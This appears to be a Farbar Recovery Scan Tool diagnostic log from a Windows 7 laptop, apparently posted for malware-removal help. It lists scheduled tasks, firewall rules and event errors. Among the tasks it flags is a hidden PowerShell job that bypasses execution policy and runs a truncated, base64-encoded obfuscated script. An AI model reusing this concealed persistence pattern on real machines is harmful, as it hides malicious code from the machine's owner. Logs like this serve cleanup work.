ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2012-01-03] (Adobe Systems Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1368194719-4233992476-1912739653-1003: [TresoritExt] -> {822B4859-CCDD-476C-ABDF-7F7A894A3CB7} => C:\Users\Kam\AppData\Local\Tresorit\v0.8\TresoritExt64_2.dll [2017-06-22] ()
ContextMenuHandlers4_S-1-5-21-1368194719-4233992476-1912739653-1003: [TresoritExt] -> {822B4859-CCDD-476C-ABDF-7F7A894A3CB7} => C:\Users\Kam\AppData\Local\Tresorit\v0.8\TresoritExt64_2.dll [2017-06-22] ()
ContextMenuHandlers5_S-1-5-21-1368194719-4233992476-1912739653-1003: [TresoritExt] -> {822B4859-CCDD-476C-ABDF-7F7A894A3CB7} => C:\Users\Kam\AppData\Local\Tresorit\v0.8\TresoritExt64_2.dll [2017-06-22] ()
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {14310811-8DCF-4F5A-B18B-86FAD74FA44F} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1003UA => C:\Users\Kam\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {18193614-1BDC-44E9-AC9B-EEC6A3017853} - \One System Care Run Delay -> No File <==== ATTENTION
Task: {1E9E7D82-57CB-4584-B6A4-9E837D814672} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe
Task: {24AAA78D-A60E-4E8F-B1F9-DEDB14DD3528} - System32\Tasks\{3371D71A-481C-4974-ADC3-23AFD723372F} => C:\windows\system32\pcalua.exe -a "C:\Users\Chef DeeWeaver\AppData\Roaming\iPumper\ipumperinst.exe" -c --uninstall
Task: {2BB0CC1D-BFC9-4147-ADD1-F821DE85EF1C} - \System Healer Task -> No File <==== ATTENTION
Task: {2CEAD6E2-FF82-4865-B5A7-A9B25617EF88} - \One System CarePeriod -> No File <==== ATTENTION
Task: {2D6FFDC9-AB88-4089-8CA9-E5EB3D99F6EA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-30] (Google Inc.)
Task: {4A054B43-D9CB-44E6-9EB6-4CF2005975D9} - \One System Care Task -> No File <==== ATTENTION
Task: {60498475-7210-4CDB-8394-A89B5FA66F16} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-11] (Adobe Systems Incorporated)
Task: {6A09BEE9-0968-4CED-A9E1-2A8FC9F0A757} - System32\Tasks\AdobeAAMUpdater-1.0-ChefDeeWeaver-Kam => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-10-30] (Adobe Systems Incorporated)
Task: {715713A9-6F8C-4056-BB08-B5B3A18D91FD} - System32\Tasks\IORRT => C:\IORRT\IORRT.bat [2015-08-02] ()
Task: {89C27FEA-CCE1-4089-AEAC-6D16AB0CEE77} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software)
Task: {89D2397F-E964-451B-9351-A9790A4FEDFA} - System32\Tasks\{01494FC6-E9B3-4347-B591-1D2A67486ECE} => C:\windows\system32\pcalua.exe -a C:\Users\Kam\Downloads\pia-v70-installer-win.exe -d C:\Users\Kam\Downloads
Task: {8BEE1C7F-F498-410E-8E9D-C2B55052345B} - System32\Tasks\{EDD64646-BD4D-49B8-A80B-D051996B143D} => C:\windows\system32\pcalua.exe -a C:\Users\Kam\AppData\Local\Temp\jre-8u111-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATTENTION
Task: {8F37DF25-04BC-4A79-969F-B972E8FFE114} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-30] (Google Inc.)
Task: {95562207-CDA8-4E71-96BB-D5B692B18ABC} - \SystemHealer Monitor -> No File <==== ATTENTION
Task: {A7283033-1E78-44F9-BC14-AC90293D633A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {A877DD71-7DBA-4713-924C-BA213E677D82} - System32\Tasks\{0C047F47-0C08-087D-7D11-09057A78110E} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAIAA7ADsAOwA7ACAAIAA7ACAAOwAgACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (the data entry has 10024 more characters). <==== ATTENTION
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - System32\Tasks\Microsoft\Windows\Application Experience\AitAgent => aitagent.exe
Task: {AC874FF3-A5C7-42F2-AD70-346F3BA5BD96} - System32\Tasks\AdobeAAMUpdater-1.0-ChefDeeWeaver-Chef DeeWeaver => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-10-30] (Adobe Systems Incorporated)
Task: {C641E3A6-0A2E-45F1-90F3-D07438048A54} - System32\Tasks\Hybrid => C:\IORRT\IORRT.bat [2015-08-02] ()
Task: {CB7E15BF-E758-4D03-BDBB-0F30997EA5CC} - \One System Care Monitor -> No File <==== ATTENTION
Task: {D29ED745-E2B2-4267-B2A8-4D445CC0366E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1000Core => C:\Users\Chef DeeWeaver\AppData\Local\Google\Update\GoogleUpdate.exe [2015-01-05] (Google Inc.)
Task: {D8BC0C70-3BDD-4FFD-97B0-0D660FC9D827} - System32\Tasks\image IntelliPoint Toolbox => C:\windows\system32\rundll32.exe "C:\Program Files\image IntelliPoint Toolbox\image IntelliPoint Toolbox.dll",XazOzaKwp <==== ATTENTION
Task: {DD1B12F5-E0C2-41E1-AE55-B69CDD450366} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1003Core => C:\Users\Kam\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {E3163C33-301D-4730-A266-5518C5ED3967} - System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask => C:\Windows\SysWOW64\BthUdTask.exe [2009-07-13] (Microsoft Corporation)
Task: {E9D94843-F171-4ACE-82B6-AA9CA50B04BD} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {EE9C78D5-CEB6-49C8-915E-0DE3BA960698} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {FB2D589C-0E98-413B-BAA9-51334F3F0CFA} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1000UA => C:\Users\Chef DeeWeaver\AppData\Local\Google\Update\GoogleUpdate.exe [2015-01-05] (Google Inc.)
Task: {FBFB07AE-C4E9-423E-AC31-C6E4021EE5B6} - \SystemHealer Run Delay -> No File <==== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1000Core.job => C:\Users\Chef DeeWeaver\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1368194719-4233992476-1912739653-1000UA.job => C:\Users\Chef DeeWeaver\AppData\Local\Google\Update\GoogleUpdate.exe
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Kam\Desktop\Kam - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Keep - notes and lists (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" --app-id=hmjkmjkepdijhoojdojkdfohbdgmmhki
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Keep - notes and lists.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=hmjkmjkepdijhoojdojkdfohbdgmmhki
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Play Music.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" --app-id=fahmaaghhglfmonjliepjlchgpgfmobi
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Mancala.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" --app-id=cjlhjhpnhabnfepdfemepiilbjbkecpe
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Nimbus Screenshot App.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" --app-id=aecjogkncpbkjfobfnoaiepipllcadhe
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Solitaire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=lkbhppfbabandkdmgjmifahoabeodiep
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Word Search Puzzle Game.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" --app-id=jninklaodadoeedinndhhlcflpmagfhd
ShortcutWithArgument: C:\Users\Kam\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\K - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
==================== Loaded Modules (Whitelisted) ==============
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Windows:AstInfo [0]
AlternateDataStreams: C:\ProgramData\TEMP:390B30B4 [726]
AlternateDataStreams: C:\ProgramData\TEMP:BC359956 [109]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\...\localhost -> localhost
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 19:34 - 2009-06-10 14:00 - 000000824 ___RH C:\windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1368194719-4233992476-1912739653-1003\Control Panel\Desktop\\Wallpaper -> C:\Users\Kam\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 68.105.28.11 - 68.105.29.11
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
==================== MSCONFIG/TASK MANAGER disabled items ==
MSCONFIG\startupreg: ApnTBMon => "C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe"
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TPwrMain => %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{054E7229-5199-44F5-9F4F-7A0726360B55}] => (Allow) LPort=2869
FirewallRules: [{1D25D7F2-E20C-43ED-B909-DCDE91FB1661}] => (Allow) LPort=1900
FirewallRules: [{33CCBDCB-1B23-4AC0-B428-0D8FC7B3BD7A}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe
FirewallRules: [{DC9111E3-7DD1-4FF5-90C9-D142408107FE}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{EF5DE06B-954D-432D-AA11-13F638F09633}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{1E8E45AB-D952-4360-87B7-485A6F1DB0D6}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{3AC8BE94-D071-430D-96B0-7D035D8B83B2}] => (Allow) LPort=443
FirewallRules: [{FE3C3C81-3427-4D9A-9E98-56C2180067E9}] => (Allow) LPort=443
FirewallRules: [{C72E1A84-2ECA-4759-B315-D17D3ED19E23}] => (Allow) LPort=37674
FirewallRules: [{61215DA7-0A53-4B3E-95B9-CDED70778F2D}] => (Allow) LPort=37674
FirewallRules: [{9FE69792-6742-428A-8085-FDD098689125}] => (Allow) LPort=37675
FirewallRules: [{978D8E50-9F80-470B-A1FA-3BD0DBD0F9BC}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{82B4E079-A7A4-4554-9CC1-1638C990C57C}D:\setup wizard\hwren1-wizard-1003.exe] => (Allow) D:\setup wizard\hwren1-wizard-1003.exe
FirewallRules: [UDP Query User{923B8887-31A2-4423-BE32-E1213E14F314}D:\setup wizard\hwren1-wizard-1003.exe] => (Allow) D:\setup wizard\hwren1-wizard-1003.exe
FirewallRules: [{A84CAD44-8B09-459E-BD0E-C14F507A4F3A}] => (Block) D:\setup wizard\hwren1-wizard-1003.exe
FirewallRules: [{6CDC8C14-34E3-46C2-B0CE-DD13853955EE}] => (Block) D:\setup wizard\hwren1-wizard-1003.exe
FirewallRules: [{327446C2-0767-4F6E-8F57-0688FD9F3666}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS615F\HPDiagnosticCoreUI.exe
FirewallRules: [{B2F1C087-E0BE-4765-8C45-70F42395A4B7}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS615F\HPDiagnosticCoreUI.exe
FirewallRules: [{EE0591CC-CEB2-4FEF-9F70-1EE805FFC635}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS61B7\HPDiagnosticCoreUI.exe
FirewallRules: [{56FF0010-B409-4486-902B-BCD6517C56DF}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS61B7\HPDiagnosticCoreUI.exe
FirewallRules: [{98B30CCB-5A45-46A5-A2A4-F4BFD2B6896A}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS1176\hppiw.exe
FirewallRules: [{071CD6E3-6C90-49DE-9FD3-0350DCED0140}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS1176\hppiw.exe
FirewallRules: [{BDD69FD9-C7FD-4F95-B926-2446954427B4}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS242A\hppiw.exe
FirewallRules: [{E2C31F66-DB4E-46A1-8D9B-172582EC3DDD}] => (Allow) C:\Users\Chef DeeWeaver\AppData\Local\Temp\7zS242A\hppiw.exe
FirewallRules: [{E15620B4-5EC7-4A67-9A2B-E47C324D5F96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{00F80037-9E2A-4308-B8DE-F2ED33F455FD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{564A5248-B97E-40DF-9FC2-C3FFF1243E75}] => (Allow) C:\windows\system32\rundll32.exe
FirewallRules: [TCP Query User{DE675D8E-6982-44DC-8512-1F24BA36C798}C:\program files\java\jdk1.8.0_91\bin\jmc.exe] => (Allow) C:\program files\java\jdk1.8.0_91\bin\jmc.exe
FirewallRules: [UDP Query User{56B8BEE6-9560-40ED-BD27-75719CD4EA1F}C:\program files\java\jdk1.8.0_91\bin\jmc.exe] => (Allow) C:\program files\java\jdk1.8.0_91\bin\jmc.exe
FirewallRules: [{A4C7F5EA-F113-4592-8A9F-1270C62ED4B0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{42EBC5B1-BE1C-4E8E-9F02-A0FE7ED52DAB}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{3EE09FCC-9039-4DA1-ACEF-0F5D01F1B175}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{675FBB79-81E0-4381-9421-C8A4748AEBFD}] => (Allow) C:\windows\system32\rundll32.exe
FirewallRules: [{3CD78E26-7237-4283-8F56-230174BE1804}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{06E72B36-9443-4EBD-975A-0457BEA6DE60}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [TCP Query User{AADF4616-73D2-4305-838E-195ED22D6C96}C:\users\kam\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\kam\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{0B97EC1C-837E-4007-B500-B65B15C21B29}C:\users\kam\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\kam\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{56C060E6-93EC-4362-BC58-6E05E7710BE0}C:\users\kam\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\kam\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{8C592BED-5134-466E-9EDD-C2858FC6C200}C:\users\kam\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\kam\appdata\roaming\utorrent\utorrent.exe
==================== Restore Points =========================
Check "winmgmt" service or repair WMI.
==================== Faulty Device Manager Devices =============
Could not list Devices. Check "winmgmt" service or repair WMI.
==================== Event log errors: =========================
Application errors:
==================
Error: (07/30/2017 05:45:08 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\svchost.exe -k netsvcs; Description = Windows Update; Error = 0x80042318).
Error: (07/30/2017 05:45:08 PM) (Source: VSS) (EventID: 12347) (User: )
Description: Volume Shadow Copy Service error: An internal inconsistency was detected in trying
to contact shadow copy service writers. The Registry Writer failed to respond to a query
from VSS. Check to see that the Event Service and Volume Shadow Copy Service
are operating properly, and please check the Application event log for any other events.
Operation:
Gathering Writer Data
Executing Asynchronous Operation
Context:
Execution Context: Requestor
Current State: GatherWriterMetadata
Error: (07/30/2017 05:44:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TosSENotify.exe, version: 1.0.64.16, time stamp: 0x4df0b6ee
Faulting module name: TosSENotify.exe, version: 1.0.64.16, time stamp: 0x4df0b6ee
Exception code: 0xc0000005
Fault offset: 0x0000000000007bfb
Faulting process id: 0x1090
Faulting application start time: 0x01d309963856cd61
Faulting application path: C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
Faulting module path: C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
Report Id: 77f99a9b-7589-11e7-9dfe-00266cec285d
Error: (07/30/2017 05:41:41 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (07/30/2017 05:40:16 PM) (Source: openvpnserv) (EventID: 0) (User: )
Description: Event-ID 0
Error: (07/30/2017 05:33:58 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\msiexec.exe /V; Description = Removed Java SE Development Kit 8 Update 91 (64-bit); Error = 0x80042318).
Error: (07/30/2017 05:33:58 PM) (Source: VSS) (EventID: 12347) (User: )
Description: Volume Shadow Copy Service error: An internal inconsistency was detected in trying
to contact shadow copy service writers. The Registry Writer failed to respond to a query
from VSS. Check to see that the Event Service and Volume Shadow Copy Service
are operating properly, and please check the Application event log for any other events.
Operation:
Gathering Writer Data
Executing Asynchronous Operation
Context:
Execution Context: Requestor
Current State: GatherWriterMetadata
Error: (07/30/2017 05:33:53 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\msiexec.exe /V; Description = Removed Java SE Development Kit 8 Update 91 (64-bit); Error = 0x80042318).
Error: (07/30/2017 05:33:53 PM) (Source: VSS) (EventID: 12347) (User: )
Description: Volume Shadow Copy Service error: An internal inconsistency was detected in trying
to contact shadow copy service writers. The Registry Writer failed to respond to a query
from VSS. Check to see that the Event Service and Volume Shadow Copy Service
are operating properly, and please check the Application event log for any other events.
Operation:
Gathering Writer Data
Executing Asynchronous Operation
Context:
Execution Context: Requestor
Current State: GatherWriterMetadata
Error: (07/30/2017 05:33:42 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\msiexec.exe /V; Description = Removed Java 8 Update 131; Error = 0x80042318).
System errors:
=============
Error: (07/30/2017 05:43:17 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140995069
Error: (07/30/2017 05:43:17 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140995069
Error: (07/30/2017 05:43:17 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140995069
Error: (07/30/2017 05:43:17 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140995069
Error: (07/30/2017 05:43:17 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630203.
Error: (07/30/2017 05:43:17 PM) (Source: PNRPSvc) (EventID: 102) (User: )
Description: The Peer Name Resolution Protocol cloud did not start because the creation of the default identity failed with error code: 0x80630203.
Error: (07/30/2017 05:43:13 PM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{48574AA1-AEEB-4888-A4A5-B61A230A30BE}.
The backup browser is stopping.
Error: (07/30/2017 05:43:09 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Peer Networking Grouping service depends on the Peer Name Resolution Protocol service which failed to start because of the following error:
%%-2140995069
Error: (07/30/2017 05:43:09 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Peer Name Resolution Protocol service terminated with the following error:
%%-2140995069
Error: (07/30/2017 05:43:10 PM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x8002801d'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
==================== Memory info ===========================
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 50%
Total physical RAM: 4043.86 MB
Available physical RAM: 1999.2 MB
Total Virtual: 8085.9 MB
Available Virtual: 6069.64 MB
==================== Drives ================================
Drive c: (TI106321W0B) (Fixed) (Total:581.04 GB) (Free:431.49 GB) NTFS ==>[system with boot components (obtained from drive)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 596.2 GB) (Disk ID: 85F7A30C)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=581 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=13.7 GB) - (Type=17)
==================== End of Addition.txt ============================